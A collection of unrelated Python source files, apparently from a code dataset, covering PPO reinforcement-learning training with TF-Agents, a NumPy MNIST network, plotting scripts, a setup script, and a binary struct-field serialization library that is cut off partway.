Default to `0.0` because no entropy bonus was used in (Schulman, 2017).
value_pred_loss_coef: Multiplier for value prediction loss to balance with
policy gradient loss. Default to `0.5`, which was used for all
      environments in the OpenAI baseline implementation. This parameter is
      irrelevant unless you are sharing part of actor_net and value_net. In that
      case, you would want to tune this coefficient, whose value depends on the
network architecture of your choice.
use_gae: If True (default False), uses generalized advantage estimation for
computing per-timestep advantage. Else, just subtracts value predictions
from empirical return.
use_td_lambda_return: If True (default False), uses td_lambda_return for
training value function; here: `td_lambda_return = gae_advantage +
value_predictions`. `use_gae` must be set to `True` as well to enable TD
-lambda returns. If `use_td_lambda_return` is set to True while
`use_gae` is False, the empirical return will be used and a warning will
be logged.
gradient_clipping: Norm length to clip gradients.
value_clipping: Difference between new and old value predictions are clipped
to this threshold. Value clipping could be helpful when training
very deep networks. Default: no clipping.
reverb_port: Port for reverb server, if None, use a randomly chosen unused
port.
replay_capacity: The maximum number of elements for the replay buffer. Items
      will be wasted if this is smaller than collect_sequence_length.
policy_save_interval: How often, in train_steps, the policy will be saved.
summary_interval: How often to write data into Tensorboard.
eval_interval: How often to run evaluation, in train_steps.
eval_episodes: Number of episodes to evaluate over.
debug_summaries: Boolean for whether to gather debug summaries.
summarize_grads_and_vars: If true, gradient summaries will be written.
"""
collect_env = suite_mujoco.load(env_name)
eval_env = suite_mujoco.load(env_name)
num_environments = 1
observation_tensor_spec, action_tensor_spec, time_step_tensor_spec = (
spec_utils.get_tensor_specs(collect_env))
# TODO(b/172267869): Remove this conversion once TensorNormalizer stops
# converting float64 inputs to float32.
observation_tensor_spec = tf.TensorSpec(
dtype=tf.float32, shape=observation_tensor_spec.shape)
train_step = train_utils.create_train_step()
actor_net = ppo_actor_network.create_sequential_actor_net(
actor_fc_layers, action_tensor_spec)
value_net = value_network.ValueNetwork(
observation_tensor_spec,
fc_layer_params=value_fc_layers,
kernel_initializer=tf.keras.initializers.Orthogonal())
current_iteration = tf.Variable(0, dtype=tf.int64)
def learning_rate_fn():
# Linearly decay the learning rate.
return learning_rate * (1 - current_iteration / num_iterations)
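  # With the defaults above (learning_rate=3e-4, num_iterations=1600), this
  # yields 3e-4 at iteration 0, 1.5e-4 halfway through (iteration 800), and
  # close to 0 on the final iteration.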
agent = ppo_clip_agent.PPOClipAgent(
time_step_tensor_spec,
action_tensor_spec,
optimizer=tf.compat.v1.train.AdamOptimizer(
learning_rate=learning_rate_fn, epsilon=1e-5),
actor_net=actor_net,
value_net=value_net,
importance_ratio_clipping=importance_ratio_clipping,
lambda_value=lambda_value,
discount_factor=discount_factor,
entropy_regularization=entropy_regularization,
value_pred_loss_coef=value_pred_loss_coef,
# This is a legacy argument for the number of times we repeat the data
# inside of the train function, incompatible with mini batch learning.
# We set the epoch number from the replay buffer and tf.Data instead.
num_epochs=1,
use_gae=use_gae,
use_td_lambda_return=use_td_lambda_return,
gradient_clipping=gradient_clipping,
value_clipping=value_clipping,
# TODO(b/150244758): Default compute_value_and_advantage_in_train to False
# after Reverb open source.
compute_value_and_advantage_in_train=False,
# Skips updating normalizers in the agent, as it's handled in the learner.
update_normalizers_in_train=False,
debug_summaries=debug_summaries,
summarize_grads_and_vars=summarize_grads_and_vars,
train_step_counter=train_step)
agent.initialize()
reverb_server = reverb.Server(
[
reverb.Table( # Replay buffer storing experience for training.
name='training_table',
sampler=reverb.selectors.Fifo(),
remover=reverb.selectors.Fifo(),
rate_limiter=reverb.rate_limiters.MinSize(1),
max_size=replay_capacity,
max_times_sampled=1,
),
reverb.Table( # Replay buffer storing experience for normalization.
name='normalization_table',
sampler=reverb.selectors.Fifo(),
remover=reverb.selectors.Fifo(),
rate_limiter=reverb.rate_limiters.MinSize(1),
max_size=replay_capacity,
max_times_sampled=1,
)
],
port=reverb_port)
# Create the replay buffer.
reverb_replay_train = reverb_replay_buffer.ReverbReplayBuffer(
agent.collect_data_spec,
sequence_length=collect_sequence_length,
table_name='training_table',
server_address='localhost:{}'.format(reverb_server.port),
# The only collected sequence is used to populate the batches.
max_cycle_length=1,
rate_limiter_timeout_ms=1000)
reverb_replay_normalization = reverb_replay_buffer.ReverbReplayBuffer(
agent.collect_data_spec,
sequence_length=collect_sequence_length,
table_name='normalization_table',
server_address='localhost:{}'.format(reverb_server.port),
# The only collected sequence is used to populate the batches.
max_cycle_length=1,
rate_limiter_timeout_ms=1000)
rb_observer = ReverbFixedLengthSequenceObserver(
reverb_replay_train.py_client, ['training_table', 'normalization_table'],
sequence_length=collect_sequence_length,
stride_length=collect_sequence_length)
saved_model_dir = os.path.join(root_dir, learner.POLICY_SAVED_MODEL_DIR)
collect_env_step_metric = py_metrics.EnvironmentSteps()
learning_triggers = [
triggers.PolicySavedModelTrigger(
saved_model_dir,
agent,
train_step,
interval=policy_save_interval,
metadata_metrics={
triggers.ENV_STEP_METADATA_KEY: collect_env_step_metric
}),
triggers.StepPerSecondLogTrigger(train_step, interval=summary_interval),
]
def training_dataset_fn():
return reverb_replay_train.as_dataset(
sample_batch_size=num_environments,
sequence_preprocess_fn=agent.preprocess_sequence)
def normalization_dataset_fn():
return reverb_replay_normalization.as_dataset(
sample_batch_size=num_environments,
sequence_preprocess_fn=agent.preprocess_sequence)
agent_learner = ppo_learner.PPOLearner(
root_dir,
train_step,
agent,
experience_dataset_fn=training_dataset_fn,
normalization_dataset_fn=normalization_dataset_fn,
num_batches=1,
num_epochs=num_epochs,
minibatch_size=minibatch_size,
shuffle_buffer_size=collect_sequence_length,
triggers=learning_triggers)
tf_collect_policy = agent.collect_policy
collect_policy = py_tf_eager_policy.PyTFEagerPolicy(
tf_collect_policy, use_tf_function=True)
collect_actor = actor.Actor(
collect_env,
collect_policy,
train_step,
steps_per_run=collect_sequence_length,
observers=[rb_observer],
metrics=actor.collect_metrics(buffer_size=10) + [collect_env_step_metric],
reference_metrics=[collect_env_step_metric],
summary_dir=os.path.join(root_dir, learner.TRAIN_DIR),
summary_interval=summary_interval)
eval_greedy_policy = py_tf_eager_policy.PyTFEagerPolicy(
agent.policy, use_tf_function=True)
if eval_interval:
    logging.info('Initial evaluation.')
eval_actor = actor.Actor(
eval_env,
eval_greedy_policy,
train_step,
metrics=actor.eval_metrics(eval_episodes),
reference_metrics=[collect_env_step_metric],
summary_dir=os.path.join(root_dir, 'eval'),
episodes_per_run=eval_episodes)
eval_actor.run_and_log()
logging.info('Training on %s', env_name)
last_eval_step = 0
for i in range(num_iterations):
collect_actor.run()
# TODO(b/159615593): Update to use observer.flush.
# Reset the reverb observer to make sure the data collected is flushed and
# written to the RB.
    # At this point, there are a small number of steps left in the cache because the
# actor does not count a boundary step as a step, whereas it still gets
# added to Reverb for training. We throw away those extra steps without
# padding to align with the paper implementation which never collects them
# in the first place.
rb_observer.reset(write_cached_steps=False)
agent_learner.run()
reverb_replay_train.clear()
reverb_replay_normalization.clear()
current_iteration.assign_add(1)
# Eval only if `eval_interval` has been set. Then, eval if the current train
# step is equal or greater than the `last_eval_step` + `eval_interval` or if
# this is the last iteration. This logic exists because agent_learner.run()
# does not return after every train step.
if (eval_interval and
(agent_learner.train_step_numpy >= eval_interval + last_eval_step
or i == num_iterations - 1)):
logging.info('Evaluating.')
eval_actor.run_and_log()
last_eval_step = agent_learner.train_step_numpy
rb_observer.close()
reverb_server.stop()
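# Example invocation (an illustrative sketch only; this library function is
# normally driven from a separate flag-parsing entry point, and the root_dir
# value here is made up):
#
# if __name__ == '__main__':
#   train_eval(
#       root_dir='/tmp/ppo_halfcheetah',
#       env_name='HalfCheetah-v2',
#       reverb_port=None)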
| 41.224324 | 80 | 0.745427 |
ac84ac6f5a21a9ae4d4ad5893ff2485d4a7cbcc2 | 1,534 | py | Python | simulation_sequence/sequence_bottleneck/plot_overlap_eachpos.py | TatsuyaHaga/laplacian_associative_memory_codes | 74679a5bb6799090fe2aaf202ee6c7242e06e67f | [
"MIT"
] | 1 | 2021-07-26T08:28:10.000Z | 2021-07-26T08:28:10.000Z | simulation_sequence/sequence_overrepresentation/plot_overlap_eachpos.py | TatsuyaHaga/laplacian_associative_memory_codes | 74679a5bb6799090fe2aaf202ee6c7242e06e67f | [
"MIT"
] | null | null | null | simulation_sequence/sequence_overrepresentation/plot_overlap_eachpos.py | TatsuyaHaga/laplacian_associative_memory_codes | 74679a5bb6799090fe2aaf202ee6c7242e06e67f | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import sys
sys.path.append("../")
import plotlib
import numpy
import pylab
import networkx
import pickle
fname=sys.argv[1]
m_time=numpy.loadtxt(fname, delimiter=",")
m_time[m_time<0]=0.0
pos=numpy.loadtxt(sys.argv[2], delimiter=",").astype(int)
Npos=m_time.shape[1]
m_pos=numpy.zeros([Npos,Npos])
for i in range(Npos):
m_pos[i,:]=numpy.mean(m_time[pos==i,:], axis=0)
border1=30
border2=60
pylab.figure(figsize=(3,3))
pylab.imshow(m_pos.T, interpolation="none", cmap="jet")
pylab.plot([0,Npos-1],[border1,border1], "--", color="white")
pylab.plot([0,Npos-1],[border2,border2], "--", color="white")
pylab.plot([border1,border1], [0,Npos-1],"--", color="white")
pylab.plot([border2,border2], [0,Npos-1],"--", color="white")
pylab.xticks([])
pylab.yticks([])
pylab.xlabel("Actual location")
pylab.ylabel("Represented location")
pylab.colorbar()
pylab.tight_layout()
pylab.savefig(fname.rstrip(".csv")+"_eachpos.pdf")
pylab.close()
cor_m=numpy.corrcoef(m_pos)
pylab.figure(figsize=(3,3))
pylab.imshow(cor_m, interpolation="none", cmap="jet")
pylab.plot([0,Npos-1],[border1,border1], "--", color="white", lw=1)
pylab.plot([0,Npos-1],[border2,border2], "--", color="white", lw=1)
pylab.plot([border1,border1], [0,Npos-1],"--", color="white", lw=1)
pylab.plot([border2,border2], [0,Npos-1],"--", color="white", lw=1)
pylab.xticks([])
pylab.yticks([])
pylab.xlabel("Location")
pylab.ylabel("Location")
pylab.colorbar()
pylab.tight_layout()
pylab.savefig(fname.rstrip(".csv")+"_eachpos_cor.pdf")
pylab.close()
| 27.890909 | 67 | 0.694263 |
bad518ea79c48bc372de1ccfa35157cc22fe1c8f | 67 | py | Python | src/utils/topo.py | mor1/reckon | 7b40ba79f90b5767430c0b8d90e6ea0c5b2a461b | [
"MIT"
] | 8 | 2021-03-30T12:28:33.000Z | 2022-02-08T06:36:14.000Z | src/utils/topo.py | mor1/reckon | 7b40ba79f90b5767430c0b8d90e6ea0c5b2a461b | [
"MIT"
] | 1 | 2021-04-12T16:18:00.000Z | 2021-04-12T16:18:00.000Z | src/utils/topo.py | mor1/reckon | 7b40ba79f90b5767430c0b8d90e6ea0c5b2a461b | [
"MIT"
] | 1 | 2021-03-29T21:38:19.000Z | 2021-03-29T21:38:19.000Z | def contain_in_cgroup(grp):
pid = os.getpid()
grp.add(pid)
| 16.75 | 27 | 0.641791 |
89ff519d08c81ec47e6b93e18e294013f02a6c24 | 3,592 | py | Python | 08_learning.py | vilas4485/Neural-Network-using-Scikit | 51bb537cdb02e902d0c47f94216f86efd71ee437 | [
"MIT"
] | 2 | 2018-05-04T16:07:26.000Z | 2018-11-17T00:07:38.000Z | 08_learning.py | vilas4485/Neural-Network-using-Scikit | 51bb537cdb02e902d0c47f94216f86efd71ee437 | [
"MIT"
] | null | null | null | 08_learning.py | vilas4485/Neural-Network-using-Scikit | 51bb537cdb02e902d0c47f94216f86efd71ee437 | [
"MIT"
] | 9 | 2018-03-06T13:53:56.000Z | 2022-02-23T13:50:57.000Z | import os
import numpy as np
import matplotlib.pyplot as plt
from mnist import load_mnist
from functions import *
class TwoLayerNet:
def __init__(self, input_size, hidden_size, output_size, weight_init_std=0.01):
self.params = {}
self.params['W1'] = weight_init_std * np.random.randn(input_size, hidden_size)
self.params['b1'] = np.zeros(hidden_size)
self.params['W2'] = weight_init_std * np.random.randn(hidden_size, output_size)
self.params['b2'] = np.zeros(output_size)
def predict(self, x):
W1, W2 = self.params['W1'], self.params['W2']
b1, b2 = self.params['b1'], self.params['b2']
l = sigmoid(np.dot(x, W1) + b1)
y = softmax(np.dot(l, W2) + b2)
return y
def loss(self, x, t):
y = self.predict(x)
return cross_entropy_error(y, t)
def accuracy(self, x, t):
y = self.predict(x)
y = np.argmax(y, axis=1)
t = np.argmax(t, axis=1)
accuracy = np.sum(y == t) / float(x.shape[0])
return accuracy
def numerical_gradient(self, x, t):
loss_W = lambda W: self.loss(x, t)
grads = {}
grads['W1'] = numerical_gradient(loss_W, self.params['W1'])
grads['b1'] = numerical_gradient(loss_W, self.params['b1'])
grads['W2'] = numerical_gradient(loss_W, self.params['W2'])
grads['b2'] = numerical_gradient(loss_W, self.params['b2'])
return grads
def gradient(self, x, t):
W1, W2 = self.params['W1'], self.params['W2']
b1, b2 = self.params['b1'], self.params['b2']
grads = {}
batch_num = x.shape[0]
a1 = np.dot(x, W1) + b1
z1 = sigmoid(a1)
a2 = np.dot(z1, W2) + b2
y = softmax(a2)
dy = (y - t) / batch_num
grads['W2'] = np.dot(z1.T, dy)
grads['b2'] = np.sum(dy, axis=0)
da1 = np.dot(dy, W2.T)
dz1 = sigmoid_grad(a1) * da1
grads['W1'] = np.dot(x.T, dz1)
grads['b1'] = np.sum(dz1, axis=0)
return grads
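# Worked shape example for the configuration below (illustrative, not part of
# the original script): with input_size=784, hidden_size=50, output_size=10 and
# a mini-batch of 100 images, x is (100, 784), W1 is (784, 50), z1 is (100, 50),
# W2 is (50, 10), and the softmax output y is (100, 10); gradient() then returns
# grads whose entries match the shapes of the corresponding parameters.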
# 1. Divide a dataset into training data and test data
(x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label=True)
network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10)
iters_num = 10000
train_size = x_train.shape[0]
batch_size = 100
learning_rate = 0.1
train_loss_list = []
train_acc_list = []
test_acc_list = []
iter_per_epoch = max(train_size / batch_size, 1)
for i in range(iters_num):
# 2. Select part of training data (mini-batch) randomly
batch_mask = np.random.choice(train_size, batch_size)
x_batch = x_train[batch_mask]
t_batch = t_train[batch_mask]
# 3. Calculate the gradient to reduce the value of the loss function
grad = network.gradient(x_batch, t_batch)
# 4. Update weights with the gradient
for key in ('W1', 'b1', 'W2', 'b2'):
network.params[key] -= learning_rate * grad[key]
loss = network.loss(x_batch, t_batch)
train_loss_list.append(loss)
if i % iter_per_epoch == 0:
train_acc = network.accuracy(x_train, t_train)
test_acc = network.accuracy(x_test, t_test)
train_acc_list.append(train_acc)
test_acc_list.append(test_acc)
print("train acc, test acc | " + str(train_acc) + ", " + str(test_acc))
markers = {'train': 'o', 'test': 's'}
x = np.arange(len(train_acc_list))
plt.plot(x, train_acc_list, label='train acc')
plt.plot(x, test_acc_list, label='test acc', linestyle='--')
plt.xlabel("epochs")
plt.ylabel("accuracy")
plt.ylim(0, 1.0)
plt.legend(loc='lower right')
plt.show()
| 28.967742 | 87 | 0.615813 |
bf253f69f80fef497fa099acbae004b228790867 | 391 | py | Python | sistema/setup.py | rdenadai/Lotofacil | 3f0144619a9f2a8ccd5792907c27c9cc4eafc38f | [
"MIT"
] | null | null | null | sistema/setup.py | rdenadai/Lotofacil | 3f0144619a9f2a8ccd5792907c27c9cc4eafc38f | [
"MIT"
] | null | null | null | sistema/setup.py | rdenadai/Lotofacil | 3f0144619a9f2a8ccd5792907c27c9cc4eafc38f | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#!/usr/bin/env python
from distutils.core import setup
from Cython.Build import cythonize
import os
LOCAL_INSTANCE = lambda *args: os.path.join(os.path.dirname(__file__), *args)
PROJECT_PATH = os.path.dirname(os.path.abspath(__file__))
print os.path.join(PROJECT_PATH, 'importar.pyx')
setup(
ext_modules=cythonize(os.path.join(PROJECT_PATH, 'importar.pyx'))
)
| 26.066667 | 77 | 0.746803 |
faf93c3f0e99fad70b7cb48ffd0bed98555261a3 | 303 | py | Python | data/multilingual/Latn.IDO/Sans_12/pdf_to_json_test_Latn.IDO_Sans_12.py | antoinecarme/pdf_to_json_tests | d57a024fde862e698d916a1178f285883d7a3b2f | [
"BSD-3-Clause"
] | 1 | 2021-09-19T19:47:35.000Z | 2021-09-19T19:47:35.000Z | data/multilingual/Latn.IDO/Sans_12/pdf_to_json_test_Latn.IDO_Sans_12.py | antoinecarme/pdf_to_json_tests | d57a024fde862e698d916a1178f285883d7a3b2f | [
"BSD-3-Clause"
] | null | null | null | data/multilingual/Latn.IDO/Sans_12/pdf_to_json_test_Latn.IDO_Sans_12.py | antoinecarme/pdf_to_json_tests | d57a024fde862e698d916a1178f285883d7a3b2f | [
"BSD-3-Clause"
] | null | null | null | import pdf_to_json as p2j
import json
url = "file:data/multilingual/Latn.IDO/Sans_12/udhr_Latn.IDO_Sans_12.pdf"
lConverter = p2j.pdf_to_json.pdf_to_json_converter()
lConverter.mImageHashOnly = True
lDict = lConverter.convert(url)
print(json.dumps(lDict, indent=4, ensure_ascii=False, sort_keys=True))
| 30.3 | 73 | 0.811881 |
02f4be186d53c5313d3c5160408b0301836d579c | 350 | py | Python | main.py | Ponce-1/SeniorProject-Clone | 633f32798ac192c5bf7636212115cc7c1ec0e7a0 | [
"MIT"
] | null | null | null | main.py | Ponce-1/SeniorProject-Clone | 633f32798ac192c5bf7636212115cc7c1ec0e7a0 | [
"MIT"
] | null | null | null | main.py | Ponce-1/SeniorProject-Clone | 633f32798ac192c5bf7636212115cc7c1ec0e7a0 | [
"MIT"
] | null | null | null | from yoloParkingDetector import yoloParkingDetector
vid = "model.avi"
classFile = "yolov3.txt"
weightsFile = "yolov3.weights"
configFile = "yolov3.cfg"
yml = "parking.yml"
json = "parkingData.json"
# Pass in zero as first argument for live feed
myDetector = yoloParkingDetector(vid, classFile, weightsFile, configFile, yml, json)
myDetector.run()
| 25 | 84 | 0.771429 |
b91e7e6236dec68d5d79f93a59b30ca2f0b0d7e2 | 677 | py | Python | tests/functional/test_app_main.py | Alex-T13/sts_13_on_FastAPI | aab2a5b542b75230c7f0d7bdcdad292f424c638c | [
"MIT"
] | 3 | 2020-11-03T23:49:28.000Z | 2020-11-13T07:25:33.000Z | tests/functional/test_app_main.py | Alex-T13/sts_13_on_FastAPI | aab2a5b542b75230c7f0d7bdcdad292f424c638c | [
"MIT"
] | 1 | 2020-11-05T11:17:40.000Z | 2020-11-05T11:17:40.000Z | tests/functional/test_app_main.py | Alex-T13/sts_13_without_FastAPI | aab2a5b542b75230c7f0d7bdcdad292f424c638c | [
"MIT"
] | 1 | 2021-01-26T19:45:37.000Z | 2021-01-26T19:45:37.000Z | import pytest
from tests.functional.pages.main import MainPage
from tests.functional.util.consts import URL_LANDING
from tests.functional.util.util import screenshot_on_failure
@pytest.mark.functional
@screenshot_on_failure
def test(browser, request):
page = MainPage(browser, URL_LANDING)
validate_title(page)
validate_content(page)
def validate_title(page: MainPage):
assert "Z37" in page.title
def validate_content(page: MainPage):
assert page.h1.tag_name == "h1"
assert page.h1.text == "Z37 study project"
assert page.p.tag_name == "p"
assert page.p.text == "This is a study project."
html = page.html
assert "<hr>" in html
| 23.344828 | 60 | 0.734121 |
c753e9a392b583df5284d620c16fdc16d1a76e56 | 1,335 | py | Python | lisa/tools/git.py | squirrelsc/LISA | 91ee86f1aa391b9290c3ab80efde55d75a26b8d7 | [
"MIT"
] | 1 | 2022-03-15T01:48:29.000Z | 2022-03-15T01:48:29.000Z | lisa/tools/git.py | squirrelsc/LISA | 91ee86f1aa391b9290c3ab80efde55d75a26b8d7 | [
"MIT"
] | null | null | null | lisa/tools/git.py | squirrelsc/LISA | 91ee86f1aa391b9290c3ab80efde55d75a26b8d7 | [
"MIT"
] | null | null | null | import pathlib
import re
from lisa.executable import Tool
from lisa.operating_system import Linux
from lisa.util import LisaException, get_matched_str
class Git(Tool):
CODE_FOLDER_PATTERN = re.compile(r"Cloning into '(.+)'")
@property
def command(self) -> str:
return "git"
@property
def can_install(self) -> bool:
return True
def _install(self) -> bool:
if isinstance(self.node.os, Linux):
self.node.os.install_packages([self])
else:
raise LisaException(
"Doesn't support to install git in Windows. "
"Make sure git is installed and in PATH"
)
return self._check_exists()
def clone(
self, url: str, cwd: pathlib.PurePath, branch: str = "", dir_name: str = ""
) -> None:
cmd = f"clone {url} {dir_name}"
        # git prints normal info to stderr, so set no_error_log to True.
result = self.run(cmd, cwd=cwd, no_error_log=True)
code_dir = get_matched_str(result.stderr, self.CODE_FOLDER_PATTERN)
full_path = cwd / code_dir
if branch:
self.checkout(branch, cwd=full_path)
def checkout(self, branch: str, cwd: pathlib.PurePath) -> None:
self.run(f"checkout {branch}", cwd=cwd, no_info_log=True, no_error_log=True)
| 30.340909 | 84 | 0.62397 |
9662060b0e81bb18132c8f1b311ed92fbf0462bc | 16,268 | py | Python | packing_tape/field_classes.py | psobot/packing-tape | 62a3ac9ddb1df4cdf8ca753e460da44b4c5ac6d5 | [
"MIT"
] | 3 | 2018-07-06T04:34:46.000Z | 2021-05-02T04:54:02.000Z | packing_tape/field_classes.py | psobot/packing-tape | 62a3ac9ddb1df4cdf8ca753e460da44b4c5ac6d5 | [
"MIT"
] | null | null | null | packing_tape/field_classes.py | psobot/packing-tape | 62a3ac9ddb1df4cdf8ca753e460da44b4c5ac6d5 | [
"MIT"
] | null | null | null | from struct import unpack_from, pack, calcsize
from bases import BinaryProperty, \
LogicalProperty, \
DummyProperty, \
Nameable, \
Validatable, \
Parseable, \
Serializable, \
Storable, \
StorageTarget
class ByteAlignedStructField(
property,
BinaryProperty,
LogicalProperty,
Validatable,
Nameable,
Parseable,
Serializable,
Storable
):
def __init__(
self,
format_string,
size,
signed,
endianness,
index,
default=0,
validate=None
):
super(ByteAlignedStructField, self).__init__(
fget=self.get, fset=self.set)
self.format_string = format_string
self.size = size
self.signed = signed
self.endianness = endianness
self.index = index
self.default = default
self.validator = validate
def initialize_with_default(self, instance):
self.set(instance, self.default)
def parse_and_get_size(self, stream):
return (
unpack_from(self.format_string, stream, 0)[0],
calcsize(self.format_string)
)
@property
def min_size(self):
return calcsize(self.format_string)
def serialize(self, instance):
return pack(self.format_string, self.get(instance))
def __repr__(self):
attrs = (
"field_name",
"format_string",
"size",
"signed",
"endianness",
"index",
)
return "<%s %s>" % (
self.__class__.__name__,
" ".join([
"%s=%s" % (attr, getattr(self, attr))
for attr in attrs
])
)
class StringField(
property,
BinaryProperty,
LogicalProperty,
Validatable,
Nameable,
Parseable,
Serializable,
Storable
):
def __init__(
self,
size,
index,
null_terminated=True,
default='',
validate=None
):
super(StringField, self).__init__(
fget=self.get, fset=self.set)
self.size = size
self.index = index
self.null_terminated = null_terminated
self.default = default
self.validator = validate
@property
def sort_order(self):
return self.index
def initialize_with_default(self, instance):
self.set(instance, self.default)
@property
def format_string(self):
return str(self.size) + 's'
def parse_and_get_size(self, stream):
return (
unpack_from(self.format_string, stream, 0)[0].rstrip("\x00"),
calcsize(self.format_string)
)
@property
def min_size(self):
return calcsize(self.format_string)
def serialize(self, instance):
if self.null_terminated:
return pack(self.format_string, self.get(instance))[:-1] + "\x00"
else:
return pack(self.format_string, self.get(instance))
def __repr__(self):
attrs = (
"field_name",
"size",
"index",
)
return "<%s %s>" % (
self.__class__.__name__,
" ".join([
"%s=%s" % (attr, getattr(self, attr))
for attr in attrs
])
)
class EmbeddedField(
property,
BinaryProperty,
LogicalProperty,
Validatable,
Nameable,
Parseable,
Serializable,
Storable
):
def __init__(
self,
struct_type,
index,
default=None,
validate=None
):
super(EmbeddedField, self).__init__(
fget=self.get, fset=self.set)
self.struct_type = struct_type
self.index = index
self.default = default
self.validator = validate
def get_size(self, instance):
return len(self.get(instance))
@property
def sort_order(self):
return self.index
def initialize_with_default(self, instance):
self.set(instance, self.default)
def parse_and_get_size(self, stream):
instance = self.struct_type.parse_from(stream, allow_invalid=True)
return instance, len(instance)
@property
def min_size(self):
return self.struct_type.min_size()
def serialize(self, instance):
return self.get(instance).serialize()
def validate(self, instance, raise_exception=True):
value = self.get(instance)
if value is None:
return True
return self.validate_value(value, raise_exception, instance)
def validate_value(self, value, raise_exception=False, instance='unknown'):
if self.validator is not None:
if self.validator(value):
pass
elif not raise_exception:
return False
else:
try:
field_name = self.field_name
except:
field_name = self
raise ValueError(
'Field "%s" is invalid (value "%s", instance %s)' % (
field_name, value, instance))
return value.validate(raise_exception=raise_exception)
def __repr__(self):
attrs = (
"field_name",
"struct_type",
"index",
"default",
)
return "<%s %s>" % (
self.__class__.__name__,
" ".join([
"%s=%s" % (attr, getattr(self, attr))
for attr in attrs
])
)
class SwitchField(
property,
BinaryProperty,
LogicalProperty,
Validatable,
Nameable,
Parseable,
Serializable,
Storable
):
def __init__(
self,
subfields,
index,
default=None
):
super(SwitchField, self).__init__(
fget=self.get, fset=self.set)
self.subfields = subfields
self.index = index
self.default = default
def get_size(self, instance):
return self.get_real_type(instance).get_size(instance)
@property
def sort_order(self):
return self.index
def initialize_with_default(self, instance):
self.set(instance, self.default)
def get_real_type(self, instance):
return super(SwitchField, self).get(instance)
def set_real_type(self, instance, type):
super(SwitchField, self).set(instance, type)
def get(self, instance):
real_type = self.get_real_type(instance)
if real_type:
return real_type.get(instance)
else:
return None
def set(self, instance, val):
for subfield in self.subfields:
if subfield.validate_value(val, raise_exception=False):
subfield.set(instance, val)
self.set_real_type(instance, subfield)
return
def parse_and_get_size(self, stream):
for subfield in self.subfields:
if len(stream) < subfield.min_size:
continue
result, size = subfield.parse_and_get_size(stream)
# TODO: Expose a better API from subfields so that we don't
# have to do this hackety hack:
if subfield.validate_value(result, raise_exception=False):
return result, size
if all(len(stream) < subfield.min_size for subfield in self.subfields):
raise ValueError(
"All subfields had minimum sizes greater than the available "
"data - no subfields parsed! (stream = %s)" % repr(stream))
else:
raise ValueError("No subfields parsed! (stream = %s)" % repr(
stream))
@property
def min_size(self):
return min([s.min_size for s in self.subfields])
def serialize(self, instance):
return self.get_real_type(instance).serialize(instance)
def validate(self, instance, raise_exception=True):
real_type = self.get_real_type(instance)
if not real_type:
if raise_exception:
raise ValueError("No valid subfields found for %s" % self)
else:
return False
val = self.get(instance)
return real_type.validate_value(
val,
raise_exception=raise_exception,
instance=instance)
def validate_value(self, val, raise_exception=True, instance='unknown'):
for subfield in self.subfields:
if subfield.validate_value(val, raise_exception=False):
real_type = subfield
break
else:
if raise_exception:
raise ValueError(
"No valid subfields would accept value %s for %s" % (
val, self))
else:
return False
return real_type.validate_value(
val,
raise_exception=raise_exception,
instance=instance)
def __repr__(self):
attrs = (
"field_name",
"subfields",
"index",
"default",
)
return "<%s %s>" % (
self.__class__.__name__,
" ".join([
"%s=%s" % (attr, getattr(self, attr))
for attr in attrs
])
)
class ArrayField(
property,
BinaryProperty,
LogicalProperty,
Validatable,
Nameable,
Parseable,
Serializable,
Storable
):
def __init__(
self,
subfield,
index,
default=None # TODO: add minimum and maximum number of elements?
):
super(ArrayField, self).__init__(
fget=self.get, fset=self.set)
self.subfield = subfield
self.index = index
self.default = default
def get_size(self, instance):
return sum([
self.subfield.get_size(target)
for target in super(ArrayField, self).get(instance)
])
@property
def sort_order(self):
return self.index
def initialize_with_default(self, instance):
self.set(instance, self.default)
def get_storage_targets(self, instance):
return super(ArrayField, self).get(instance)
def set_storage_targets(self, instance, targets):
return super(ArrayField, self).set(instance, targets)
def get(self, instance):
targets = super(ArrayField, self).get(instance)
return [self.subfield.get(target) for target in targets]
def set(self, instance, vals):
if not isinstance(vals, list) and not isinstance(vals, tuple):
raise ValueError(
"This property (%s) requires an array or tuple value." % (
instance))
# Create a new StorageTarget for each of the sub-values present.
self.set_storage_targets(instance, [StorageTarget() for _ in vals])
# Call the subfield's setter but passing each of these targets
# instead of the original instance.
for target, val in zip(self.get_storage_targets(instance), vals):
self.subfield.set(target, val)
def parse_and_get_size(self, stream):
results = []
total_size = 0
while (total_size + self.subfield.min_size) <= len(stream):
result, size = self.subfield.parse_and_get_size(
stream[total_size:])
if not self.subfield.validate_value(result, raise_exception=False):
break
results.append(result)
total_size += size
return results, total_size
@property
def min_size(self):
return 0
def serialize(self, instance):
targets = super(ArrayField, self).get(instance)
return "".join([
self.subfield.serialize(target)
for target in targets
])
def validate(self, instance, raise_exception=True):
values = self.get(instance)
storage_targets = self.get_storage_targets(instance)
if values:
return all([
self.subfield.validate_value(
value,
raise_exception=raise_exception,
instance=target)
for (target, value) in zip(storage_targets, values)
])
else:
return True
def __repr__(self):
attrs = (
"field_name",
"subfield",
"index",
"default",
)
return "<%s %s>" % (
self.__class__.__name__,
" ".join([
"%s=%s" % (attr, getattr(self, attr))
for attr in attrs
])
)
class Empty(property, DummyProperty, Serializable, Storable):
def __init__(self, index, size):
super(Empty, self).__init__(
fget=self.get, fset=self.set)
self.index = index
self.size = size
default = 0
def initialize_with_default(self, instance):
pass
def serialize(self, instance):
return "\x00" * self.size
def parse_and_get_size(self, instance):
return None, self.size
@property
def min_size(self):
return self.size
class Bit(object):
size = 1
def __init__(self, default=False, validate=None):
self.default = default
self.validator = validate
class FieldProxy(property, LogicalProperty, Nameable):
parent = None
@property
def sort_order(self):
return self.parent.sort_order + (self.index / self.parent.field_count)
class ProxyTarget:
pass
class BitProxy(FieldProxy, Validatable):
def __init__(self, parent, bit_index, default=False, validate=None):
super(BitProxy, self).__init__(
fget=self.get,
fset=self.set)
self.parent = parent
self.bit_index = bit_index
self.bitmask = 1 << (7 - self.bit_index)
self.default = default
self.validator = validate
size = 1
@property
def index(self):
return self.parent.index
def get(self, instance):
value = self.parent.get(instance)
if isinstance(value, str):
asint = ord(value)
else:
asint = value
return bool(asint & self.bitmask)
def set(self, instance, value):
existing_field_value = self.parent.get(instance)
existing_field_value &= ~self.bitmask
if value:
existing_field_value |= self.bitmask
return self.parent.set(instance, existing_field_value)
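# Worked example of the bitmask arithmetic above (illustrative): bit_index
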